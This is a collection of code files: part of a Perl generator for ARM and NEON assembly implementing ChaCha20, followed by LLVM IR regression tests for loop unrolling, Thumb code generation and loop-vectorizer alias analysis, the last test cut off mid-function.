ldmia @t[0],{@t[0]-@t[3]} @ load key material
___
}
$code.=<<___;
# ifdef __thumb2__
it ne
# endif
ldrne @t[0],[sp,#4*(32+2)] @ re-load len
# ifdef __thumb2__
it hs
# endif
subhs @t[3],@t[0],#64 @ len-=64
bhi .Loop_outer
beq .Ldone
#endif
.Ltail:
ldr r12,[sp,#4*(32+1)] @ load inp
add @t[1],sp,#4*(0)
ldr r14,[sp,#4*(32+0)] @ load out
.Loop_tail:
ldrb @t[2],[@t[1]],#1 @ read buffer on stack
ldrb @t[3],[r12],#1 @ read input
subs @t[0],@t[0],#1
eor @t[3],@t[3],@t[2]
strb @t[3],[r14],#1 @ store output
bne .Loop_tail
.Ldone:
add sp,sp,#4*(32+3)
.Lno_data:
ldmia sp!,{r4-r11,pc}
.size ChaCha20_ctr32,.-ChaCha20_ctr32
___
{{{
my ($a0,$b0,$c0,$d0,$a1,$b1,$c1,$d1,$a2,$b2,$c2,$d2,$t0,$t1,$t2,$t3) =
map("q$_",(0..15));
sub NEONROUND {
my $odd = pop;
my ($a,$b,$c,$d,$t)=@_;
(
"&vadd_i32 ($a,$a,$b)",
"&veor ($d,$d,$a)",
"&vrev32_16 ($d,$d)", # vrot ($d,16)
"&vadd_i32 ($c,$c,$d)",
"&veor ($t,$b,$c)",
"&vshr_u32 ($b,$t,20)",
"&vsli_32 ($b,$t,12)",
"&vadd_i32 ($a,$a,$b)",
"&veor ($t,$d,$a)",
"&vshr_u32 ($d,$t,24)",
"&vsli_32 ($d,$t,8)",
"&vadd_i32 ($c,$c,$d)",
"&veor ($t,$b,$c)",
"&vshr_u32 ($b,$t,25)",
"&vsli_32 ($b,$t,7)",
"&vext_8 ($c,$c,$c,8)",
"&vext_8 ($b,$b,$b,$odd?12:4)",
"&vext_8 ($d,$d,$d,$odd?4:12)"
);
}
$code.=<<___;
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.type ChaCha20_neon,%function
.align 5
ChaCha20_neon:
ldr r12,[sp,#0] @ pull pointer to counter and nonce
stmdb sp!,{r0-r2,r4-r11,lr}
.LChaCha20_neon:
adr r14,.Lsigma
vstmdb sp!,{d8-d15} @ ABI spec says so
stmdb sp!,{r0-r3}
vld1.32 {$b0-$c0},[r3] @ load key
ldmia r3,{r4-r11} @ load key
sub sp,sp,#4*(16+16)
vld1.32 {$d0},[r12] @ load counter and nonce
add r12,sp,#4*8
ldmia r14,{r0-r3} @ load sigma
vld1.32 {$a0},[r14]! @ load sigma
vld1.32 {$t0},[r14] @ one
vst1.32 {$c0-$d0},[r12] @ copy 1/2key|counter|nonce
vst1.32 {$a0-$b0},[sp] @ copy sigma|1/2key
str r10,[sp,#4*(16+10)] @ off-load "@x[10]"
str r11,[sp,#4*(16+11)] @ off-load "@x[11]"
vshl.i32 $t1#lo,$t0#lo,#1 @ two
vstr $t0#lo,[sp,#4*(16+0)]
vshl.i32 $t2#lo,$t0#lo,#2 @ four
vstr $t1#lo,[sp,#4*(16+2)]
vmov $a1,$a0
vstr $t2#lo,[sp,#4*(16+4)]
vmov $a2,$a0
vmov $b1,$b0
vmov $b2,$b0
b .Loop_neon_enter
.align 4
.Loop_neon_outer:
ldmia sp,{r0-r9} @ load key material
cmp @t[3],#64*2 @ if len<=64*2
bls .Lbreak_neon @ switch to integer-only
vmov $a1,$a0
str @t[3],[sp,#4*(32+2)] @ save len
vmov $a2,$a0
str r12, [sp,#4*(32+1)] @ save inp
vmov $b1,$b0
str r14, [sp,#4*(32+0)] @ save out
vmov $b2,$b0
.Loop_neon_enter:
ldr @t[3], [sp,#4*(15)]
vadd.i32 $d1,$d0,$t0 @ counter+1
ldr @x[12],[sp,#4*(12)] @ modulo-scheduled load
vmov $c1,$c0
ldr @t[2], [sp,#4*(13)]
vmov $c2,$c0
ldr @x[14],[sp,#4*(14)]
vadd.i32 $d2,$d1,$t0 @ counter+2
str @t[3], [sp,#4*(16+15)]
mov @t[3],#10
add @x[12],@x[12],#3 @ counter+3
b .Loop_neon
.align 4
.Loop_neon:
subs @t[3],@t[3],#1
___
my @thread0=&NEONROUND($a0,$b0,$c0,$d0,$t0,0);
my @thread1=&NEONROUND($a1,$b1,$c1,$d1,$t1,0);
my @thread2=&NEONROUND($a2,$b2,$c2,$d2,$t2,0);
my @thread3=&ROUND(0,4,8,12);
foreach (@thread0) {
eval; eval(shift(@thread3));
eval(shift(@thread1)); eval(shift(@thread3));
eval(shift(@thread2)); eval(shift(@thread3));
}
@thread0=&NEONROUND($a0,$b0,$c0,$d0,$t0,1);
@thread1=&NEONROUND($a1,$b1,$c1,$d1,$t1,1);
@thread2=&NEONROUND($a2,$b2,$c2,$d2,$t2,1);
@thread3=&ROUND(0,5,10,15);
foreach (@thread0) {
eval; eval(shift(@thread3));
eval(shift(@thread1)); eval(shift(@thread3));
eval(shift(@thread2)); eval(shift(@thread3));
}
$code.=<<___;
bne .Loop_neon
add @t[3],sp,#32
vld1.32 {$t0-$t1},[sp] @ load key material
vld1.32 {$t2-$t3},[@t[3]]
ldr @t[3],[sp,#4*(32+2)] @ load len
str @t[0], [sp,#4*(16+8)] @ modulo-scheduled store
str @t[1], [sp,#4*(16+9)]
str @x[12],[sp,#4*(16+12)]
str @t[2], [sp,#4*(16+13)]
str @x[14],[sp,#4*(16+14)]
@ at this point we have first half of 512-bit result in
@ @x[0-7] and second half at sp+4*(16+8)
ldr r12,[sp,#4*(32+1)] @ load inp
ldr r14,[sp,#4*(32+0)] @ load out
vadd.i32 $a0,$a0,$t0 @ accumulate key material
vadd.i32 $a1,$a1,$t0
vadd.i32 $a2,$a2,$t0
vldr $t0#lo,[sp,#4*(16+0)] @ one
vadd.i32 $b0,$b0,$t1
vadd.i32 $b1,$b1,$t1
vadd.i32 $b2,$b2,$t1
vldr $t1#lo,[sp,#4*(16+2)] @ two
vadd.i32 $c0,$c0,$t2
vadd.i32 $c1,$c1,$t2
vadd.i32 $c2,$c2,$t2
vadd.i32 $d1#lo,$d1#lo,$t0#lo @ counter+1
vadd.i32 $d2#lo,$d2#lo,$t1#lo @ counter+2
vadd.i32 $d0,$d0,$t3
vadd.i32 $d1,$d1,$t3
vadd.i32 $d2,$d2,$t3
cmp @t[3],#64*4
blo .Ltail_neon
vld1.8 {$t0-$t1},[r12]! @ load input
mov @t[3],sp
vld1.8 {$t2-$t3},[r12]!
veor $a0,$a0,$t0 @ xor with input
veor $b0,$b0,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c0,$c0,$t2
veor $d0,$d0,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a1,$a1,$t0
vst1.8 {$a0-$b0},[r14]! @ store output
veor $b1,$b1,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c1,$c1,$t2
vst1.8 {$c0-$d0},[r14]!
veor $d1,$d1,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a2,$a2,$t0
vld1.32 {$a0-$b0},[@t[3]]! @ load for next iteration
veor $t0#hi,$t0#hi,$t0#hi
vldr $t0#lo,[sp,#4*(16+4)] @ four
veor $b2,$b2,$t1
vld1.32 {$c0-$d0},[@t[3]]
veor $c2,$c2,$t2
vst1.8 {$a1-$b1},[r14]!
veor $d2,$d2,$t3
vst1.8 {$c1-$d1},[r14]!
vadd.i32 $d0#lo,$d0#lo,$t0#lo @ next counter value
vldr $t0#lo,[sp,#4*(16+0)] @ one
ldmia sp,{@t[0]-@t[3]} @ load key material
add @x[0],@x[0],@t[0] @ accumulate key material
ldr @t[0],[r12],#16 @ load input
vst1.8 {$a2-$b2},[r14]!
add @x[1],@x[1],@t[1]
ldr @t[1],[r12,#-12]
vst1.8 {$c2-$d2},[r14]!
add @x[2],@x[2],@t[2]
ldr @t[2],[r12,#-8]
add @x[3],@x[3],@t[3]
ldr @t[3],[r12,#-4]
# ifdef __ARMEB__
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
# endif
eor @x[0],@x[0],@t[0] @ xor with input
add @t[0],sp,#4*(4)
eor @x[1],@x[1],@t[1]
str @x[0],[r14],#16 @ store output
eor @x[2],@x[2],@t[2]
str @x[1],[r14,#-12]
eor @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[2],[r14,#-8]
str @x[3],[r14,#-4]
add @x[4],@x[4],@t[0] @ accumulate key material
ldr @t[0],[r12],#16 @ load input
add @x[5],@x[5],@t[1]
ldr @t[1],[r12,#-12]
add @x[6],@x[6],@t[2]
ldr @t[2],[r12,#-8]
add @x[7],@x[7],@t[3]
ldr @t[3],[r12,#-4]
# ifdef __ARMEB__
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
eor @x[4],@x[4],@t[0]
add @t[0],sp,#4*(8)
eor @x[5],@x[5],@t[1]
str @x[4],[r14],#16 @ store output
eor @x[6],@x[6],@t[2]
str @x[5],[r14,#-12]
eor @x[7],@x[7],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[6],[r14,#-8]
add @x[0],sp,#4*(16+8)
str @x[7],[r14,#-4]
ldmia @x[0],{@x[0]-@x[7]} @ load second half
add @x[0],@x[0],@t[0] @ accumulate key material
ldr @t[0],[r12],#16 @ load input
add @x[1],@x[1],@t[1]
ldr @t[1],[r12,#-12]
# ifdef __thumb2__
it hi
# endif
strhi @t[2],[sp,#4*(16+10)] @ copy "@x[10]" while at it
add @x[2],@x[2],@t[2]
ldr @t[2],[r12,#-8]
# ifdef __thumb2__
it hi
# endif
strhi @t[3],[sp,#4*(16+11)] @ copy "@x[11]" while at it
add @x[3],@x[3],@t[3]
ldr @t[3],[r12,#-4]
# ifdef __ARMEB__
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
# endif
eor @x[0],@x[0],@t[0]
add @t[0],sp,#4*(12)
eor @x[1],@x[1],@t[1]
str @x[0],[r14],#16 @ store output
eor @x[2],@x[2],@t[2]
str @x[1],[r14,#-12]
eor @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[2],[r14,#-8]
str @x[3],[r14,#-4]
add @x[4],@x[4],@t[0] @ accumulate key material
add @t[0],@t[0],#4 @ next counter value
add @x[5],@x[5],@t[1]
str @t[0],[sp,#4*(12)] @ save next counter value
ldr @t[0],[r12],#16 @ load input
add @x[6],@x[6],@t[2]
add @x[4],@x[4],#3 @ counter+3
ldr @t[1],[r12,#-12]
add @x[7],@x[7],@t[3]
ldr @t[2],[r12,#-8]
ldr @t[3],[r12,#-4]
# ifdef __ARMEB__
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
eor @x[4],@x[4],@t[0]
# ifdef __thumb2__
it hi
# endif
ldrhi @t[0],[sp,#4*(32+2)] @ re-load len
eor @x[5],@x[5],@t[1]
eor @x[6],@x[6],@t[2]
str @x[4],[r14],#16 @ store output
eor @x[7],@x[7],@t[3]
str @x[5],[r14,#-12]
sub @t[3],@t[0],#64*4 @ len-=64*4
str @x[6],[r14,#-8]
str @x[7],[r14,#-4]
bhi .Loop_neon_outer
b .Ldone_neon
.align 4
.Lbreak_neon:
@ harmonize NEON and integer-only stack frames: load data
@ from NEON frame, but save to integer-only one; distance
@ between the two is 4*(32+4+16-32)=4*(20).
str @t[3], [sp,#4*(20+32+2)] @ save len
add @t[3],sp,#4*(32+4)
str r12, [sp,#4*(20+32+1)] @ save inp
str r14, [sp,#4*(20+32+0)] @ save out
ldr @x[12],[sp,#4*(16+10)]
ldr @x[14],[sp,#4*(16+11)]
vldmia @t[3],{d8-d15} @ fulfill ABI requirement
str @x[12],[sp,#4*(20+16+10)] @ copy "@x[10]"
str @x[14],[sp,#4*(20+16+11)] @ copy "@x[11]"
ldr @t[3], [sp,#4*(15)]
ldr @x[12],[sp,#4*(12)] @ modulo-scheduled load
ldr @t[2], [sp,#4*(13)]
ldr @x[14],[sp,#4*(14)]
str @t[3], [sp,#4*(20+16+15)]
add @t[3],sp,#4*(20)
vst1.32 {$a0-$b0},[@t[3]]! @ copy key
add sp,sp,#4*(20) @ switch frame
vst1.32 {$c0-$d0},[@t[3]]
mov @t[3],#10
b .Loop @ go integer-only
.align 4
.Ltail_neon:
cmp @t[3],#64*3
bhs .L192_or_more_neon
cmp @t[3],#64*2
bhs .L128_or_more_neon
cmp @t[3],#64*1
bhs .L64_or_more_neon
add @t[0],sp,#4*(8)
vst1.8 {$a0-$b0},[sp]
add @t[2],sp,#4*(0)
vst1.8 {$c0-$d0},[@t[0]]
b .Loop_tail_neon
.align 4
.L64_or_more_neon:
vld1.8 {$t0-$t1},[r12]!
vld1.8 {$t2-$t3},[r12]!
veor $a0,$a0,$t0
veor $b0,$b0,$t1
veor $c0,$c0,$t2
veor $d0,$d0,$t3
vst1.8 {$a0-$b0},[r14]!
vst1.8 {$c0-$d0},[r14]!
beq .Ldone_neon
add @t[0],sp,#4*(8)
vst1.8 {$a1-$b1},[sp]
add @t[2],sp,#4*(0)
vst1.8 {$c1-$d1},[@t[0]]
sub @t[3],@t[3],#64*1 @ len-=64*1
b .Loop_tail_neon
.align 4
.L128_or_more_neon:
vld1.8 {$t0-$t1},[r12]!
vld1.8 {$t2-$t3},[r12]!
veor $a0,$a0,$t0
veor $b0,$b0,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c0,$c0,$t2
veor $d0,$d0,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a1,$a1,$t0
veor $b1,$b1,$t1
vst1.8 {$a0-$b0},[r14]!
veor $c1,$c1,$t2
vst1.8 {$c0-$d0},[r14]!
veor $d1,$d1,$t3
vst1.8 {$a1-$b1},[r14]!
vst1.8 {$c1-$d1},[r14]!
beq .Ldone_neon
add @t[0],sp,#4*(8)
vst1.8 {$a2-$b2},[sp]
add @t[2],sp,#4*(0)
vst1.8 {$c2-$d2},[@t[0]]
sub @t[3],@t[3],#64*2 @ len-=64*2
b .Loop_tail_neon
.align 4
.L192_or_more_neon:
vld1.8 {$t0-$t1},[r12]!
vld1.8 {$t2-$t3},[r12]!
veor $a0,$a0,$t0
veor $b0,$b0,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c0,$c0,$t2
veor $d0,$d0,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a1,$a1,$t0
veor $b1,$b1,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c1,$c1,$t2
vst1.8 {$a0-$b0},[r14]!
veor $d1,$d1,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a2,$a2,$t0
vst1.8 {$c0-$d0},[r14]!
veor $b2,$b2,$t1
vst1.8 {$a1-$b1},[r14]!
veor $c2,$c2,$t2
vst1.8 {$c1-$d1},[r14]!
veor $d2,$d2,$t3
vst1.8 {$a2-$b2},[r14]!
vst1.8 {$c2-$d2},[r14]!
beq .Ldone_neon
ldmia sp,{@t[0]-@t[3]} @ load key material
add @x[0],@x[0],@t[0] @ accumulate key material
add @t[0],sp,#4*(4)
add @x[1],@x[1],@t[1]
add @x[2],@x[2],@t[2]
add @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
add @x[4],@x[4],@t[0] @ accumulate key material
add @t[0],sp,#4*(8)
add @x[5],@x[5],@t[1]
add @x[6],@x[6],@t[2]
add @x[7],@x[7],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
# ifdef __ARMEB__
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
stmia sp,{@x[0]-@x[7]}
add @x[0],sp,#4*(16+8)
ldmia @x[0],{@x[0]-@x[7]} @ load second half
add @x[0],@x[0],@t[0] @ accumulate key material
add @t[0],sp,#4*(12)
add @x[1],@x[1],@t[1]
add @x[2],@x[2],@t[2]
add @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
add @x[4],@x[4],@t[0] @ accumulate key material
add @t[0],sp,#4*(8)
add @x[5],@x[5],@t[1]
add @x[4],@x[4],#3 @ counter+3
add @x[6],@x[6],@t[2]
add @x[7],@x[7],@t[3]
ldr @t[3],[sp,#4*(32+2)] @ re-load len
# ifdef __ARMEB__
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
stmia @t[0],{@x[0]-@x[7]}
add @t[2],sp,#4*(0)
sub @t[3],@t[3],#64*3 @ len-=64*3
.Loop_tail_neon:
ldrb @t[0],[@t[2]],#1 @ read buffer on stack
ldrb @t[1],[r12],#1 @ read input
subs @t[3],@t[3],#1
eor @t[0],@t[0],@t[1]
strb @t[0],[r14],#1 @ store output
bne .Loop_tail_neon
.Ldone_neon:
add sp,sp,#4*(32+4)
vldmia sp,{d8-d15}
add sp,sp,#4*(16+3)
ldmia sp!,{r4-r11,pc}
.size ChaCha20_neon,.-ChaCha20_neon
.comm OPENSSL_armcap_P,4,4
#endif
___
}}}
foreach (split("\n",$code)) {
s/\`([^\`]*)\`/eval $1/geo;
s/\bq([0-9]+)#(lo|hi)/sprintf "d%d",2*$1+($2 eq "hi")/geo;
print $_,"\n";
}
close STDOUT;
| {
"language": "Assembly"
} |
; RUN: opt < %s -loop-unroll -S | FileCheck %s
target datalayout = "e-m:o-i64:64-f80:128-n8:16:32:64-S128"
; This test shows how unrolling an inner loop could break LCSSA for an outer
; loop, and there is no cheap way to recover it.
;
; In this case the inner loop, L3, is being unrolled. It only runs one
; iteration, so unrolling basically means replacing
; br i1 true, label %exit, label %L3_header
; with
; br label %exit
;
; However, this change messes up the loops structure: for instance, block
; L3_body no longer belongs to L2. It becomes an exit block for L2, so LCSSA
; phis for definitions in L2 should now be placed there. In particular, we need
; to insert such a definition for %y1.
; CHECK-LABEL: @foo1
define void @foo1() {
entry:
br label %L1_header
L1_header:
br label %L2_header
L2_header:
%y1 = phi i64 [ undef, %L1_header ], [ %x.lcssa, %L2_latch ]
br label %L3_header
L3_header:
%y2 = phi i64 [ 0, %L3_latch ], [ %y1, %L2_header ]
%x = add i64 undef, -1
br i1 true, label %L2_latch, label %L3_body
L2_latch:
%x.lcssa = phi i64 [ %x, %L3_header ]
br label %L2_header
; CHECK: L3_body:
; CHECK-NEXT: %y1.lcssa = phi i64 [ %y1, %L3_header ]
L3_body:
store i64 %y1, i64* undef
br i1 false, label %L3_latch, label %L1_latch
L3_latch:
br i1 true, label %exit, label %L3_header
L1_latch:
%y.lcssa = phi i64 [ %y2, %L3_body ]
br label %L1_header
exit:
ret void
}
; Additional tests for some corner cases.
;
; CHECK-LABEL: @foo2
define void @foo2() {
entry:
br label %L1_header
L1_header:
br label %L2_header
L2_header:
%a = phi i64 [ undef, %L1_header ], [ %dec_us, %L3_header ]
br label %L3_header
L3_header:
%b = phi i64 [ 0, %L3_latch ], [ %a, %L2_header ]
%dec_us = add i64 undef, -1
br i1 true, label %L2_header, label %L3_break_to_L1
; CHECK: L3_break_to_L1:
; CHECK-NEXT: %a.lcssa = phi i64 [ %a, %L3_header ]
L3_break_to_L1:
br i1 false, label %L3_latch, label %L1_latch
L1_latch:
%b_lcssa = phi i64 [ %b, %L3_break_to_L1 ]
br label %L1_header
L3_latch:
br i1 true, label %Exit, label %L3_header
Exit:
ret void
}
; CHECK-LABEL: @foo3
define void @foo3() {
entry:
br label %L1_header
L1_header:
%a = phi i8* [ %b, %L1_latch ], [ null, %entry ]
br i1 undef, label %L2_header, label %L1_latch
L2_header:
br i1 undef, label %L2_latch, label %L1_latch
; CHECK: L2_latch:
; CHECK-NEXT: %a.lcssa = phi i8* [ %a, %L2_header ]
L2_latch:
br i1 true, label %L2_exit, label %L2_header
L1_latch:
%b = phi i8* [ undef, %L1_header ], [ null, %L2_header ]
br label %L1_header
L2_exit:
%a_lcssa1 = phi i8* [ %a, %L2_latch ]
br label %Exit
Exit:
%a_lcssa2 = phi i8* [ %a_lcssa1, %L2_exit ]
ret void
}
; PR26688
; CHECK-LABEL: @foo4
define i8 @foo4() {
entry:
br label %L1_header
L1_header:
%x = icmp eq i32 1, 0
br label %L2_header
L2_header:
br label %L3_header
L3_header:
br i1 true, label %L2_header, label %L3_exiting
L3_exiting:
br i1 true, label %L3_body, label %L1_latch
; CHECK: L3_body:
; CHECK-NEXT: %x.lcssa = phi i1
L3_body:
br i1 %x, label %L3_latch, label %L3_latch
L3_latch:
br i1 false, label %L3_header, label %exit
L1_latch:
br label %L1_header
exit:
ret i8 0
}
| {
"language": "Assembly"
} |
; RUN: llc < %s -mtriple=thumb | FileCheck %s
; CHECK: .code 16
define void @f() {
ret void
}
| {
"language": "Assembly"
} |
; RUN: opt < %s -O1 -loop-vectorize -force-vector-interleave=1 -force-vector-width=4 -dce -instcombine -S | FileCheck %s
target datalayout = "e-p:32:32:32-i1:8:8-i8:8:8-i16:16:16-i32:32:32-i64:64:64-f32:32:32-f64:64:64-v64:64:64-v128:64:128-a0:0:64-n32-S64"
%struct.anon = type { [100 x i32], i32, [100 x i32] }
%struct.anon.0 = type { [100 x [100 x i32]], i32, [100 x [100 x i32]] }
@Foo = common global %struct.anon zeroinitializer, align 4
@Bar = common global %struct.anon.0 zeroinitializer, align 4
@PB = external global i32*
@PA = external global i32*
;; === First, the tests that should always vectorize, whether statically or by adding run-time checks ===
; /// Different objects, positive induction, constant distance
; int noAlias01 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i] = Foo.B[i] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias01(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias01(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx1 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add, i32* %arrayidx1, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx2, align 4
ret i32 %7
}
; /// Different objects, positive induction with widening slide
; int noAlias02 (int a) {
; int i;
; for (i=0; i<SIZE-10; i++)
; Foo.A[i] = Foo.B[i+10] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias02(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias02(i32 %a) {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 90
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%add = add nsw i32 %1, 10
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %add
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add1 = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add1, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Different objects, positive induction with shortening slide
; int noAlias03 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i+10] = Foo.B[i] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias03(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias03(i32 %a) {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%add1 = add nsw i32 %4, 10
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %add1
store i32 %add, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Pointer access, positive stride, run-time check added
; int noAlias04 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; *(PA+i) = *(PB+i) + a;
; return *(PA+a);
; }
; CHECK-LABEL: define i32 @noAlias04(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
;
; TODO: This test vectorizes (with run-time check) on real targets with -O3)
; Check why it's not being vectorized even when forcing vectorization
define i32 @noAlias04(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32*, i32** @PB, align 4
%2 = load i32, i32* %i, align 4
%add.ptr = getelementptr inbounds i32, i32* %1, i32 %2
%3 = load i32, i32* %add.ptr, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32*, i32** @PA, align 4
%6 = load i32, i32* %i, align 4
%add.ptr1 = getelementptr inbounds i32, i32* %5, i32 %6
store i32 %add, i32* %add.ptr1, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32*, i32** @PA, align 4
%9 = load i32, i32* %a.addr, align 4
%add.ptr2 = getelementptr inbounds i32, i32* %8, i32 %9
%10 = load i32, i32* %add.ptr2, align 4
ret i32 %10
}
; /// Different objects, positive induction, multi-array
; int noAlias05 (int a) {
; int i, N=10;
; for (i=0; i<SIZE; i++)
; Bar.A[N][i] = Bar.B[N][i] + a;
; return Bar.A[N][a];
; }
; CHECK-LABEL: define i32 @noAlias05(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias05(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
%N = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 10, i32* %N, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%2 = load i32, i32* %N, align 4
%arrayidx = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 2), i32 0, i32 %2
%arrayidx1 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx, i32 0, i32 %1
%3 = load i32, i32* %arrayidx1, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32, i32* %i, align 4
%6 = load i32, i32* %N, align 4
